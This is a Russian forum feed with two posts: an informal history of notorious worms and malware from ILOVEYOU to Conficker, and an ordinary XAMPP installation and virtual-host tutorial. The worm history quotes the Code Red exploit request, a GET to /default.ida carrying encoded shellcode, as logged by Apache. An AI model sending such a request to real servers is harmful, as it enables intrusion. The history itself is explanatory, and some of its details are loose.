году — новая почтовая эпидемия, вызванная вирусом Love Letter (или Love Bug). Письма, содержащие незамысловатое ILOVEYOU в строке темы, посыпались на ничего не подозревавших пользователей градом. И все было бы замечательно, если бы к письму не был приложен скриптик на Visual Basic Script, замаскированный под текстовый файл.<br />The Subject: ILOVEYOU<br />Message body: kindly check the<br />attached LOVELETTER coming from me.<br />Attached file: LOVE-LETTER-FORYOU.TXT.vbs<br />На лицо отличный пример социальной инженерии и прием двойного расширения, — что помогло скрыть подлинную природу файла. По умолчанию Винда не показывала второе, настоящее, расширение файла, поэтому принять аттач за обычный текстовик действительно было проще простого. Ну а коль пользователь файл запустил, можно делать свое дело. Написанная с использованием механизма Windows Scripting Host, малварь честно рассылает копии тела по всем адресам из адресной книги почтовой программы MS Outlook, после чего приступает к деструктивной части, закачивая и устанавливая в системе троя. Путь до исполняемого файла прописывался как домашняя страница в параметрах Internet Explorer. Это обеспечивало его автоматическую загрузку, а запуск в системе гарантировал специально созданный ключ в реестре. Далее домашняя страница возвращалась на свое место — и ушастый пользователь даже не замечал изменений. Тем временем, WIN-BUGSFIX.EXE или Microsoftv25.exe честно отправлял автору отснифанные пароли.<br />Трик с использованием двойного расширения автор заюзал не только в письмах. Для файлов целого ряда расширений, червь создавал свои копии, добавляя к их названию расширение .vbs. Если в папке был файл rulez.mp3, то тут же создавался rulez.mp3.vbs с телом червя — и так повсюду.<br />В основе другого способа распространения, который так же давал плоды, лежали скрипты для mIRC — самой распространенной программы для бешено популярных тогда IRC-чатов. Пользователям чата автоматически передавалась HTML-ка, предлагающая закачать некий ActiveX-элемент. Что находилось внутри, объяснять не надо, но поверь на слово: посмотреть, что прислал им хороший приятель, соглашались очень многие.<br />Первый случай активности Love Letter был зафиксирован 4 мая 2000 г., а уже через сутки им были частично или полностью поражены сети ЦРУ, NASA, Министерства энергетики, конгресса США, Пентагона, британской палаты общин и еще множества организаций. Ущерб, нанесенный червем в первые дни активности, был оценен в $5 миллионов. Офигительно? Виновника этого безобразия помог найти оставленный им автограф: «barok -loveletter(vbe) &lt; i hate go to school &gt; by: spyder / ispyder@mail.com / Manila,Philippines». Но в виду отсутствия местных законов за подобные преступления, никакой ответственности он не понес.<br /><img class="postimg" loading="lazy" src="https://s56.radikal.ru/i153/1008/83/8547b1ac1aaf.bmp" alt="http://s56.radikal.ru/i153/1008/83/8547b1ac1aaf.bmp" /><br />а вот так выглядело письмо ILOVEYOU</p> <p><span style="color: red"><span style="display: block; text-align: center"><strong>Code Red</strong></span></span></p> <p>Из-за этого червя сайту Белого дома США в 2002 году пришлось поменять IP-адрес . Стартовавшего 13 июля 2001 года, Code Red интересовали виндовые машины с запущенным веб демоном IIS на борту и включенной системой индексирования. О существовании критической уязвимости, приводящей к переполнению буфера, в Microsoft знали задолго до появления вируса, а за месяц до эпидемии была опубликована заплатка. Впрочем, это не помешало запущенному 13 июля червю заразить за 6 следующих дней более 350 тысяч машин. Брешь в ISS позволяла легко выполнять на сервере удаленный код. Разработчики Code Red не сильно заморачивались и приделали эксплоит к простейшему сканеру, который работал «в лоб». Во время сканирования Code Red не проверял наличие IIS на новом компьютере-жертве, а тупо отправлял специально сформированные HTTP-запросы на сгенерированные случайно IP-адреса в надежде, что где-то на 80-порту окажется вожделенный IIS. Море запросов— огромный объем трафика. В итоге, оборудование попросту стало задыхаться от мусорных GET-запросов, которые генерировали ноды по всему мира. В логах Apache, на который, естественно, уязвимость IIS не распространялась, можно было обнаружить подобные строки:<br />GET /default.ida?NNNNNNNNNNNNNNNNNN<br />NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN<br />NNNNNNNNNNNNNNNNNNNNNNN%u9090%u685<br />8%ucbd3%u7801%u9090%u6858%ucbd3%u7<br />801%u9090%u6858%ucbd3%u7801%u9090%<br />u9090%u8190%u00c3%u0003%u8b00%u531<br />b%u53ff%u0078%u0000%u00=a HTTP/1.0<br />В процессе работы Code Red не использовал никаких временных или постоянных файлов. Червь уникален: он существовал либо в системной памяти зараженных компьютеров, либо в виде TCP/IP-пакета при пересылке на удаленные машины. Но наличие заразы на сервере обнаруживалось без всякого антивируса. Поскольку в памяти компьютера могли существовать сразу сотни активных процессов Code Red, то тормоза и лаги были неизбежны. Червь заменял содержимое страниц на зараженных серверах на сообщение: «HELLO! Welcome to <a href="http://www.worm.com" rel="nofollow" target="_blank">http://www.worm.com</a>! Hacked By Chinese!», но был избирателен и дефейсил только те системы, где в качестве основного языка был установлен английский.Через некоторое время, правда, дефейс снимался автоматически: видимо, разработчики не хотели раньше времени терять драгоценную ноду.<br />Между 20 и 28 числами месяца тело червя должно было начать DoS-атаку на несколько IP-адресов, один из которых принадлежал американскому Белому дому.<br />В августе этого же года начал распространяться новый червь Code Red II, код которого, несмотря на схожее название, был создан заново и предоставлял владельцам полный контроль над зараженными машинами, копируя файл cmd.exe в каталог \inetpub\scripts\ ISS-сервера. В отличие от оригинального Code Red, клон старался атаковать хосты в той же подсети и не допускал одновременного запуска себя на одной системе.<br /><img class="postimg" loading="lazy" src="https://s45.radikal.ru/i107/1008/36/31fea6e53654.bmp" alt="http://s45.radikal.ru/i107/1008/36/31fea6e53654.bmp" /><br />Code Red дефейсил системы с английской локалью</p> <p><span style="color: red"><span style="display: block; text-align: center"><strong>Nimda</strong></span></span></p> <p>Запустившегося в сентябре 2001 года червя ну никак не могли не связать с деятельностью Алькайды, заодно рассказывая о мощных технологиях, применяемых в новой заразе. Но если присказки о терроризме были выдумкой журналистов, то очевидная продвинутость нового червя была на лицо. Фишка Nimda заключалась сразу в нескольких каналах распространения, благодаря которым ему удалось в считанные минуты распространиться по Сети. Разберемся по порядку.<br />1. Наибольший пробив был получен за счет эксплоита, который использовал уязвимость в Internet Explore’е, позволяющую автоматически запускать приаттаченный к письму файл. Прикрепленный к письму README.EXE (написаный, кстати, на С++) беспрепятственно запускался на машине при простом открытия письма, и комфортно начинал свое распространение. Причем, для поиска новых адресатов вирус кропотливо сканировал текстовые документы на жестком диске, а также запрашивал с помощью специальной MAPI-функции список адресатов с сервера Microsoft Exchange.<br />2. Другой способ распространения — расшаренные ресурсы в локалке. После сканирования всех доступных шар Nimda создавал там файлы с почтовыми сообщениями, имеющие расширение .EML и .NWS.Открытие таких файлов происходит в почтовой программе, что автоматически влекло за собой заражение, как если бы письмо просто пришло по почте.<br />3. Не могли забыть создатели и про дырявый IIS, уязвимость в котором уже использовали другие черви. Поэтому Nimda довольно эффективно пробивал майкросовский веб-демон с помощью уязвимости directory traversal. В случае заражения веб-сервера на нем случайным образом выбирались странички, откуда начиналась загрузка вируса посетителям.<br />4. И еще интересный ход — Nimda не стеснялся и активно использовал для распространения бекдоры, оставленные в системах червями Code Red II и sadmind/IIS.<br />Добавим, что Nimda имел опасный побочный эффект, который мог допустить утечку конфиденциальной информации с зараженных компьютеров. Червь добавлял пользователя под именем «Guest» в группу пользователей «Администраторы». Таким образом, обычные гости получали полный доступ к ресурсам компьютера. Более того, все локальные диски открывались через шары для полного доступа.<br />Автор этого вируса официально не найден, но в теле червя содержится строка, указывающая, что создатель из Китая: «Concept Virus(CV) V.5, Copyright(C)2001 R.P.China»<br /><img class="postimg" loading="lazy" src="https://s43.radikal.ru/i099/1008/1c/43dae9d2be92.png" alt="http://s43.radikal.ru/i099/1008/1c/43dae9d2be92.png" /><br />разные способы заражения червя Nimda</p> <p><span style="color: red"><span style="display: block; text-align: center"><strong>Slammer</strong></span></span></p> <p>Незадачливые жители стран Северной Америки были сильно удивлены, когда 25 января многие банкоматы попросту перестали работать. Во всем мире со сбоями работали службы по заказу и резервированию авиабилетов, многие сервисы вообще не были доступны. Но набивший оскомину финансовый кризис тут вовсе не причем — это лишь всплеск активности червя Slammer. Активность впервые замечена в 12:30 по среднеатлантическому времени, а к 12:33 количество зараженных машин удваивалось каждые 8.5 секунд.<br />В основе червя лежала уязвимость в Microsoft SQL Server, концепция которой была представлена David Litchfield на конференции BlackHat. Отправляя на 1434 скомпрометированный пакет, вирус мог выполнить на удаленной машине произвольный код и, в свою очередь, продолжить распространение. По различным отчетам сообщается, что вирусу удалось заразить 75.000 машин за каких-то десять минут, — но как? Уязвимый модуль IIS, позволяющий приложениям автоматически обращаться к нужной базе данных, принимал запросы как раз по UDP, а тело вируса, составляющее всего 376 байт, отлично помещалось в один единственный UDP-пакет. В результате Slammer не использовал тормозной TCP, требующий постоянных квитков-подтверждений, а рассылал себя по ненадежному UDP со скоростью несколько десятков запросов в секунду! Несмотря на то, что патч для уязвимости был выпущен за 6 месяцев до эпидемии, а вирус никак не проявлял себя на зараженной машине, последствия от Slammer’а были колоссальными. Роутеры и маршрутизаторы на магистралях были настолько перегружены трафиком, что лавинообразно выбивали другу друга в конце концов отключив некоторые бэкбоны. Южная Корея была полностью отрублена от инета и находилась в таком состоянии почти 24 часа. Только представь: никакого интернета и мобильной связи с внешним миром для 27 миллионов человек. Забавно, что многие жертвы даже не знали, что на их машине установлена такая специфическая вещь, как SQL.<br /><img class="postimg" loading="lazy" src="https://s52.radikal.ru/i135/1008/e3/4f2e35740ced.bmp" alt="http://s52.radikal.ru/i135/1008/e3/4f2e35740ced.bmp" /><br />сетевая активность Slammer'a</p> <p><span style="color: red"><span style="display: block; text-align: center"><strong>Sasser</strong></span></span></p> <p>Уж что-что, а окошко System Shutdown, инициированное NT AUTHORITY\SYSTEM с обратным отсчетом и сообщением о принудительной перезагрузке компьютера видел почти каждый — годом ранее, во время эпидемии Blaster’а, либо же в 2004, когда стал бушевать во многом похожий на него Sasser. Принципиальная разница червей в том, что они используют критические уязвимости в разных службах. Для размножения Sasser использует баг переполнения буфера в службе Local Security Authority Subsystem Service (LSAS) — отсюда и название червя. Написанное на С++ тело Sasser в первоначальной версии открывает 128 параллельных потоков, и, используя специальный алгоритм по генерации IP-адресов, пытается найти системы с незащищенным 445 портом и уязвимым сервисом. Сплоит работал на «ура», правда, приводил к ошибке на системе пользователя. Sasser открывал на 9997 порту шелл, через который далее и заливалось все необходимое. Само тело червя без лишнего геморроя просто передавалось по протоколу через FTP, причем сервер также открывался на зараженных компьютерах на 5554 порту. Как часто бывает, шелл-код сплоита отличается от системы к системе, поэтому Sasser предварительно проверял версии удаленной системы, чтобы выбрать правильный набор параметров для атаки.<br />Оригинальная версия червя Sasser распространялась достаточно медленно, но через несколько дней в Сети были выпущены модификации, распространяющиеся гораздо быстрее. К этому моменту число зараженных машин измерялось сотнями тысяч, а в пике эпидемии речь шла о миллионах. В Финляндии были отменены рейсы местной авиакомпании, во многих странах закрыты некоторые отделения крупнейших банков. Автором заразы оказался 18-летний немецкий студент Свен Яшан, хотя изначально разрабатывался «русский след». Юного вредителя заложил кто-то из своих, позарившись на обещанное Microsoft’ом награждение в 250.000 баксов. Помимо Sasser, на компьютере парнишки нашли еще и многочисленные модификации червя Netsky.<br /><img class="postimg" loading="lazy" src="https://s52.radikal.ru/i137/1008/72/b9705946f08c.bmp" alt="http://s52.radikal.ru/i137/1008/72/b9705946f08c.bmp" /><br />ошибка системы после заражения Sasser'om</p> <p><span style="color: red"><span style="display: block; text-align: center"><strong>Sony rootkit</strong></span></span></p> <p>Забавный факт: это единственный руткит, который распространялся легально! Win32/Rootkit.XCP, или «sony rootkit», является частью системы защиты аудио-CD,выпускаемых Sony BMG. Растроенная всепоглощающим пиратством компания решила бороться с нелегальным копированием с помощью DRM-компонентов (Digital Rights Management), а в попытке скрыть их присутствие в системе обратилась в компанию First 4 Internet, чтобы те написали маскирующий руткит. В итоге, система защиты дисков вместе с руткитом стала инсталлироваться на компьютер пользователя автоматически, когда в привод вставляется защищенный компакт диск. После установки, в системе появлялись два новых сервиса, которые и выполняли все функции. Установленный драйвер $sys$aries (aries.sys) скрывает все файлы и ключи в реестре, которые начинаются с «$sys$» посредством перехвата нативных API-функций. Win32/Rootkit.XCP отслеживает обращения к System Service Table (SST) и перехватывает обращения к функциям: NtCreateFile, NtEnumerateKey, NtOpenKey, NtQueryDirectoryFile, NtQuerySystemInformation. В результате удается скрыть присутствие ключей в реестре, папок, файлов и процессов.<br />Ты спросишь: а в чем, собственно, трабл? Ну, скрывает этот руткит работу нужных ему компонентов, что с того? Очень просто. Сразу после появления руткита, Марк Руссинович в своем блоге рассказал о многочисленных брешах в собственной защите программы. И был прав: очень скоро механизм, предназначенный для сокрытия файлов и процессов, быстро приспособили для своих нужд кодеры вирусов. Более того, распространение этого ноу-хао само по себе приводило к нестабильности системы, зависанию компьютера и потере данных из-за кривых драйверов, установленных в систему. И даже тогда, когда Sony выпустила специальную тулзу, избавиться от это дряни полностью было очень и очень затруднительно.<br /><img class="postimg" loading="lazy" src="https://s61.radikal.ru/i171/1008/6e/19a1f694d07c.bmp" alt="http://s61.radikal.ru/i171/1008/6e/19a1f694d07c.bmp" /><br />BSOD из-за корявых драйверов Sony rootkit</p> <p><span style="color: red"><span style="display: block; text-align: center"><strong>Warezov</strong></span></span></p> <p>На дворе — 2006 год, только вот ушастые пользователи по-прежнему открывают все вложения в письмах, а программно им мало кто запрещает это делать. Результат? Огромный ботнет Warezov (он же Stration), который авторы сумели собрать за счет одноименного червя, рассылаемого по email. Никаких сплоитов и уязвимостей, — социальная инженерия и людская тупость. И ведь повсю трубят: «Не открывай вложений» — так ведь все равно кликают. Особенность червя Warezov — в огромном количестве вариаций, которые появлялись, как грибы после дождя. Был момент, когда новые модификации появлялись чуть ли не раз в 30 минут. Даже с обновленными антивирусными базами многие юзеры оставались не у дел. Впоследствии, когда на веб-серверах глобально начали вычищать все письма со зловредными аттачами, модификации перекинулись на IM-сети. А один из вариантов Warezov стал первым червем, который распространялся через Skype!<br />Как и подобает трою для ботнета, тело Warezov позволяло владельцам загрузить на компьютер любую заразу. Червь содержит в себе список жестко прописанных URL-адресов (что, конечно, минус), которые он проверяет на наличие файлов. В случае если по какому-либо из этих адресов будет размещен файл, он загрузится в систему и запустится. Основной модуль Warezov способен завершать различные процессы, а также останавливать и удалять службы антивирусных программ и персональных брандмауэров. Для организации рассылки червь использует собственный SMTP-сервер. Главное использование ботнета — это, конечно же, спам. Однако многие ноды служили для хостинга так называемых fast-flux платформ, позволяя спамерам прятать настоящее расположение их спамерских сайтов за IP-адресом жертвы. IP менялся настолько часто, что его невозможно было прикрыть. Warezov достигал этого двумя средствами: во-первых, reverse HTTP proxy, которая получала контент с настоящего (скрываемого) сайта, а также DNS-сервера, на котором специальная версия Bind под Windows меняла записи по нужному алгоритму.<br /><img class="postimg" loading="lazy" src="https://s005.radikal.ru/i212/1008/52/00ec3e2aec81.bmp" alt="http://s005.radikal.ru/i212/1008/52/00ec3e2aec81.bmp" /><br />временный файл Warezov</p> <p><span style="color: red"><span style="display: block; text-align: center"><strong>Storm</strong></span></span></p> <p>Ботнет, созданный с помощью червя Storm, можно смело назвать произведением искуства. Децентрализованная P2P-сеть, в которой большинство хостов сидит тихо и ждет указаний. Доменные имена разрешаются в постоянно меняющиеся IP-адреса (опять же fast-flux domains). Часть кода червя — полиморфная. В пике — более миллиона инфицированных хостов. Как это удалось?<br />Эпидемия червя началась с компьютеров в Европе и Соединенных Штатах 19 января 2008 года, когда, прикрываясь темой урагана в Европе, пользователям повалились письма с предложением открыть вложенный файл с названиями Full Clip.exe, Full Story.exe, Read More.exe или Video.exe.<br />Все попавшиеся на удочку машины автоматически объединялись в ботнет, но в отличие от других сетей, он не использовал специальный управляющий сервер, доступ к которому легко перекрыть. Принцип управления Storm больше напоминает пиринговую сеть, в которой зараженные ноды подключаются к своему управляющему хосту (он руководит обычно 30-45 зомби), а хосты взаимодействуют между друг другом. Причем роль хоста в случае необходимости может занять любая из нод. Вся сеть устроена так, что полного списка нодов нет ни у кого, поэтому точные размеры ботнета так и остались загадкой. По разным подсчетам, он варьировался от одного до нескольких миллионов машин.<br />Помимо функций по работе с ботнетом, Storm устанавливает в системе руткит: Win32.agent.dh, посредством которого держатели ботнета могли стащить любую конфиденциальную инфу, рассылать спам и устраивать мощные DDoS-атаки.<br /><img class="postimg" loading="lazy" src="https://s40.radikal.ru/i087/1008/a2/b31d7cc1713a.png" alt="http://s40.radikal.ru/i087/1008/a2/b31d7cc1713a.png" /><br />техника fast-flux в картинках</p> <p><span style="color: red"><span style="display: block; text-align: center"><strong>Merboot</strong></span></span></p> <p>Загрузочные вирусы, о которых все благополучно успели забыть, возвращаются. В 2005 году на хакерской конференции Black Hat специалисты eEye Digital Security продемонстрировали концепт так называемого буткита, размещающего в загрузочном секторе диска код, который перехватывает загрузку ядра Windows и запускает бэкдор с возможностью удаленного управления по локальной сети. Презентация прошла на ура, а в 2008 году, после длительного затишья в области руткитов, выстрелил Mebroot. Новый троян использовал представленную еще в 2005 году идею и размещал свое тело в бут-секторе диска, после чего вносил модификации в ядро Винды, которые затрудняли обнаружение вредоносного кода антивирусами. Подцепить заразу мог кто угодно: компы заражались через свежие сплоиты с популярных сайтов. Вредоносный код сначала изменяет MBR (главная загрузочная запись), записывает руткит-части в сектора диска, извлекает из себя и устанавливает бэкдор в Windows, после чего самоудаляется. В результате заражения, в MBR размещаются инструкции, передающие управление основной части руткита, размещенного в разных секторах жесткого диска. Именно эта часть, уже после загрузки системы, перехватывает API-функции и скрывает зараженный MBR. Кроме традиционных функций по сокрытию своего присутствия в системе, вредоносный код устанавливает в Windows бэкдор, который занимается кражей банковских аккаунтов.<br /><img class="postimg" loading="lazy" src="https://s43.radikal.ru/i100/1008/4c/239c64e6ba49.bmp" alt="http://s43.radikal.ru/i100/1008/4c/239c64e6ba49.bmp" /><br />с Merboot'om до сих пор справляются далеко не все антивирусы</p> <p><span style="color: red"><span style="display: block; text-align: center"><strong>Downadup</strong></span></span></p> <p>Червя, нашумевшего в январе, называют по-разному: Downadup, Conficker, Kido. Важно одно: новой малваре за несколько дней удалось заразить миллионы компьютеров, и собранный ботнет функционирует до сих пор. Разработчикам удалось лихо диверсифицировать способы распространения, объединив в одном черве сразу несколько успешных методик. Самый эффективный способ — приватный сплоит, использующий непропатченную систему с уязвимостью переполнения буфера MS08-067 в сервисе «Сервер» (патч вышел еще в октябре). Для этого червь отсылает удаленной машине специальным образом сформированный RPC- запрос, вызывающий переполнение буфера при вызове функции wcscpy_s в библиотеке netapi32.dll. На компьютере запускается специальный код-загрузчик, который скачивает с уже зараженной машины исполняемый файл червя и запускает его.<br />Кроме этого, червь отлично тиражирует себя через «Сетевое окружение», перебирая пароль администратора к системной шаре ADMIN$. А давно известный способ распространения через флешки претерпел изменения: в результате обфускации Autorun.inf (разработчики просто добавили в файл кучу мусора) удалось обмануть многие сигнатурные антивирусы. Несколько способов = максимальный эффект! Другая ключевая особенность заключается в том, как червь скачивает на зараженную машину трояна (для дальнейшей рассылки вируса, DDoS’а и т.д.). Разработчики отказались от размещения файлов на каком-то жестко зафиксированном серваке. Вместо этого код червя получает на нескольких популярных ресурсах текущую дату и по ней генерирует список из 250 доменов, используя специальный алгоритм. Задача хозяев ботнета — заблаговременно эти домены зарегистрировать и разместить там файлы для загрузки. Противостоять этому не столько сложно, сколько дорого.<br />Перехватывая API-вызовы, отвечающие за обращение к DNS, заразе долгое время удавалось сдерживать антивирусы, которые банально не могли обновиться, обращаясь к заблокированным доменам, содержащим слова kaspersky, nod, symantec, microsoft и т.д.<br /><img class="postimg" loading="lazy" src="https://s58.radikal.ru/i162/1008/f0/6c5c767fd900.png" alt="http://s58.radikal.ru/i162/1008/f0/6c5c767fd900.png" /><br />разные способы распространения червя Downadup</p> mybb@mybb.ru (administrator) Mon, 07 Mar 2011 23:48:58 +0300 https://forumis.fludilka.su/viewtopic.php?pid=5#p5 https://forumis.fludilka.su/viewtopic.php?pid=4#p4 <p><span style="color: green">Установка и настройка сервера XAMPP на Windows</span></p> <p>Для начала рассмотрим что из себя представляет веб-сервер XAMPP и сравним версии для Windows.</p> <p><strong>XAMPP — кроссплатформенная сборка веб-сервера, содержащая Apache, MySQL, интерпретатор скриптов PHP, язык программирования Perl и большое количество дополнительных библиотек, позволяющих запустить полноценный веб-сервер.</strong></p> <p><span style="color: green"><span style="display: block; text-align: center">Установка веб-сервера XAMPP</span></span></p> <p><strong>1.</strong> Начинаем установку XAMPP. Откроется окно, в котором нам предлагается выбрать путь для размещения сервера. По-умолчанию это диск C:\. Я не буду изменять путь и установлю сервер на предложенный диск. Нажимаем кнопку Install и ждем пока дистрибутив полностью распакуется.<br /><img class="postimg" loading="lazy" src="https://www.bormotuhi.net/imagehosting/2010/09/15/14c908ec79a2f3.jpg" alt="http://www.bormotuhi.net/imagehosting/2010/09/15/14c908ec79a2f3.jpg" /></p> <p><img class="postimg" loading="lazy" src="https://www.bormotuhi.net/imagehosting/2010/09/15/14c908ed6ad7c0.jpg" alt="http://www.bormotuhi.net/imagehosting/2010/09/15/14c908ed6ad7c0.jpg" /></p> <p><strong> 2</strong>.После распаковки дистрибутива запустится командная строка, далее основная установка будет происходить через нее. XAMPP предлагает создать ярлыки на рабочем столе и в меню пуск, нажимаем enter.</p> <p><img class="postimg" loading="lazy" src="https://www.bormotuhi.net/imagehosting/2010/09/15/14c908f366151c.jpg" alt="http://www.bormotuhi.net/imagehosting/2010/09/15/14c908f366151c.jpg" /></p> <p><strong>3.</strong> Теперь у нас спрашивают, правильно ли выбран каталог установки XAMPP, по-умолчанию сервер будет располагаться по следующему адресу C:\xampp, нажимаем enter.<br /><img class="postimg" loading="lazy" src="https://www.bormotuhi.net/imagehosting/2010/09/15/14c908f66be925.jpg" alt="http://www.bormotuhi.net/imagehosting/2010/09/15/14c908f66be925.jpg" /></p> <p><strong>4.</strong> Хотим ли мы установить портативную версию? Нажимаем enter, т.к. XAMPP устанавливается на жесткий диск.<br /><img class="postimg" loading="lazy" src="https://www.bormotuhi.net/imagehosting/2010/09/15/14c908f9742cc6.jpg" alt="http://www.bormotuhi.net/imagehosting/2010/09/15/14c908f9742cc6.jpg" /></p> <p><strong>5.</strong> Окончательная установка XAMPP. Нажимаем enter для продолжения.<br /><img class="postimg" loading="lazy" src="https://www.bormotuhi.net/imagehosting/2010/09/15/14c908fb81c767.jpg" alt="http://www.bormotuhi.net/imagehosting/2010/09/15/14c908fb81c767.jpg" /></p> <p><strong>6.</strong> Автоматический выбор часового пояса. Нажимаем enter.<br /><img class="postimg" loading="lazy" src="https://www.bormotuhi.net/imagehosting/2010/09/15/14c908fe7d1deb.jpg" alt="http://www.bormotuhi.net/imagehosting/2010/09/15/14c908fe7d1deb.jpg" /><br /><strong>7.</strong> Запустим панель управления XAMPP (XAMPP Control Panel), выбираем 1 и жмем enter.</p> <p><strong>8.</strong> Открылась панель управления сервером. Закрываем командную строку.</p> <p><img class="postimg" loading="lazy" src="https://www.bormotuhi.net/imagehosting/2010/09/15/14c90907f0f098.jpg" alt="http://www.bormotuhi.net/imagehosting/2010/09/15/14c90907f0f098.jpg" /></p> <p><span style="color: yellow">Подсказки по панели управления:</span></p> <p>Checkboxes (Svc) — устанавливает модуль в качестве службы Windows (если вы хотите запускать какой либо модуль (Apache, MySQL и т.д.) как службу, то отмечаем соответствующие флажки)<br />Admin — запускует администрирование модулем (Admin напротив модуля Apache — откроет окно приветствия XAMPP, выбираем язык. И попадаем в веб-интерфейс XAMPP, здесь можно проверить демонстрационные примеры в разделе Demos, узнать информацию о модулях и т.д. Admin напротив модуля MySQL — запустит phpMyAdmin)<br />Shell — запуск командной строки для работы с сервером;<br />Setup — открывает командную строку для настройки XAMPP;<br />Port-Check — проверка портов;<br />Explore — открывает папку в которую установлен XAMPP, в нашем случае C:\xampp;<br />SCM — открывает окно управления службами Windows;<br />Refresh — обновление состояния модулей;</p> <p>Запускается XAMPP с помощью ярлыка на рабочем столе или в меню пуск, если же вы при установке отказались от создания ярлыков, вы можете запустить XAMPP с помощью файла xampp-control.exe в директории C:\xampp, там же вы можете увидеть все остальные ярлыки, которыми можно запустить отдельные модули, деинсталировать XAMPP и т.п.</p> <p>Иконка XAMPP удобно сидит в трее и при щелчке левой кнопки мыши открывает панель управления (XAMPP Control Panel).</p> <p><strong>9. </strong>Запускаем модули Apache и MySQL (кнопки Start), набираем в браузере localhost (или жмем Admin напротив модуля Apache):<br /><img class="postimg" loading="lazy" src="https://www.bormotuhi.net/imagehosting/2010/09/15/14c9090dc0600d.jpg" alt="http://www.bormotuhi.net/imagehosting/2010/09/15/14c9090dc0600d.jpg" /></p> <p><strong>10.</strong> При первом запуске откроется страница приветствия, выбираем один из предложенных языков:</p> <p><img class="postimg" loading="lazy" src="https://www.bormotuhi.net/imagehosting/2010/09/15/14c9091040bdd4.jpg" alt="http://www.bormotuhi.net/imagehosting/2010/09/15/14c9091040bdd4.jpg" /></p> <p><strong>11.</strong> Попадаем в веб-интерфейс XAMPP, здесь вы можете ознакомиться документацией, примерами в разделе Demos и т.д.:</p> <p><img class="postimg" loading="lazy" src="https://www.bormotuhi.net/imagehosting/2010/09/15/14c909144063c6.jpg" alt="http://www.bormotuhi.net/imagehosting/2010/09/15/14c909144063c6.jpg" /></p> <p>В разделе Security находятся настройки безопасности:<br /><img class="postimg" loading="lazy" src="https://www.bormotuhi.net/imagehosting/2010/09/15/14c909169b3574.jpg" alt="http://www.bormotuhi.net/imagehosting/2010/09/15/14c909169b3574.jpg" /></p> <p>Перейдя по указанной ссылке http://localhost/security/xamppsecurity.php, можно задать пароль для администратора баз данных MySQL и можно установить пароль на директорию XAMPP для ограничения доступа из локальной сети:<br /><img class="postimg" loading="lazy" src="https://www.bormotuhi.net/imagehosting/2010/09/15/14c90918fa89bf.jpg" alt="http://www.bormotuhi.net/imagehosting/2010/09/15/14c90918fa89bf.jpg" /></p> <p>Итак, мы установили и ознакомились с веб-сервером XAMPP, теперь настало время создать тестовую страницу и разместить наш проект.</p> <p>Для того чтобы создать новый сайт на локальном веб-сервере, необходимо создать папку с названием сайта в папке C:\xampp\htdocs\, например blog и создадим там тестовый php-скрипт с кодом:</p> <p><span style="color: yellow">&lt;?php echo 'Hello world!'; ?&gt;</span></p> <p>Сохраним как index.php. Структура папок:</p> <p>Переходим в браузере по адресу http://localhost/blog/ и, если все сделано правильно, видим приветствие «Hello world!», тем самым мы протестировали работоспособность сервера:<br /><img class="postimg" loading="lazy" src="https://www.bormotuhi.net/imagehosting/2010/09/15/14c9091be0488f.jpg" alt="http://www.bormotuhi.net/imagehosting/2010/09/15/14c9091be0488f.jpg" /></p> <p><span style="color: yellow">Веб-сервер можно установить и другим способом, для этого необходимо распаковать инсталятор или ZIP-архив в любое удобное для вас место на жестком диске, название папки xampp можно переименовать, например в server и запустить установку с помощью файла setup_xampp.bat в этой папке, повторить все шаги описанные выше. Если вы устанавливаете XAMPP впервые, то рекомендую на время первого ознакомления не менять названия папок и установить веб-сервер по дефолту, чтобы потом не искать ошибок, которые могут возникнуть при указании неверных путей для виртуальных хостов, речь о которых пойдет ниже.</span></p> <p><span style="color: green">Настройка виртуальных хостов</span></p> <p>Если мы хотим хранить свои проекты в другой папке (например, Мои документы) или локальная версия сайта должна работать при переходе по адресу wwwblog.ru вам необходимо разобраться с настройкой виртуальных хостов, об этом и пойдет речь в данном подразделе.</p> <p>Предположим наш сайт должен храниться на диске C в папке my_projects (C:\my_projects), в браузере он должен открываться по адресу wwwblog.local или blog.local.</p> <p>Создадим в папке my_projects папку с названием blog.local, в ней создадим папки www и logs. В папку www положим наш тестовый скрипт index.php.</p> <p>Вот так это будет выглядеть в файловой системе Windows:<br /><img class="postimg" loading="lazy" src="https://www.bormotuhi.net/imagehosting/2010/09/15/14c9092069414e.png" alt="http://www.bormotuhi.net/imagehosting/2010/09/15/14c9092069414e.png" /></p> <p>Теперь перейдем к настройке виртуальных хостов. Открываем в текстовом редакторе файл httpd-vhosts.conf, расположенный по следующему адресу: C:\xampp\apache\conf\extra.<br /></p> <p>Примечание: рекомендую для большего удобства создать сразу ярлык для этого файла, например в папке C:\xampp, чтобы потом можно было быстро добавлять новые виртуальные хосты.</p> <p>Все что находится в файле httpd-vhosts.conf мы трогать не будем, а просто добавим наши хосты (просто скопируйте и вставьте в файл приведенный ниже код)</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 31.5em"><pre>NameVirtualHost *:80 &lt;VirtualHost *:80&gt; DocumentRoot &quot;C:\xampp\htdocs&quot; ServerName localhost &lt;/VirtualHost&gt; &lt;VirtualHost *:80&gt; ServerAdmin webmaster@blog.local DocumentRoot &quot;C:\my_projects\blog.local\www&quot; ServerName blog.local ServerAlias www.blog.local ErrorLog &quot;C:\my_projects\blog.local\logs\error.log&quot; CustomLog &quot;C:\my_projects\blog.local\logs\access.log&quot; combined &lt;Directory &quot;C:\my_projects\blog.local\www&quot;&gt; AllowOverride All Order allow,deny Allow from all &lt;/Directory&gt; &lt;/VirtualHost&gt;</pre></div></div></div><p>Верхний виртуальный хост, выделен другим цветом, позволит нам по прежнему заходить на localhost (локальный сайт XAMPP).</p> <p>Следующим шагом нам потребуется добавить две строчки в файл hosts, расположенный по следующему адресу C:\Windows\System32\drivers\etc\hosts (также рекомендую создать для него ярлык в папке сервера):<br />127.0.0.1 blog.local<br />127.0.0.1 wwwblog.local</p> <p>Заходим в панель управления XAMPP (XAMPP Control Panel) и перезапускаем Apache. Теперь проверим наш сайт, который должен работать по адресу wwwblog.local. Если все сделано верно, то мы увидим приветствие «Hello world!».</p> <p>Так как скорее всего понадобится создание нескольких сайтов на локальном сервере, приведу пример добавления хостов в файл httpd-vhosts.conf. Предположим новый сайт будет называться site.local:</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 35em"><pre>NameVirtualHost *:80 &lt;VirtualHost *:80&gt; DocumentRoot &quot;C:\xampp\htdocs&quot; ServerName localhost &lt;/VirtualHost&gt; &lt;VirtualHost *:80&gt; ServerAdmin 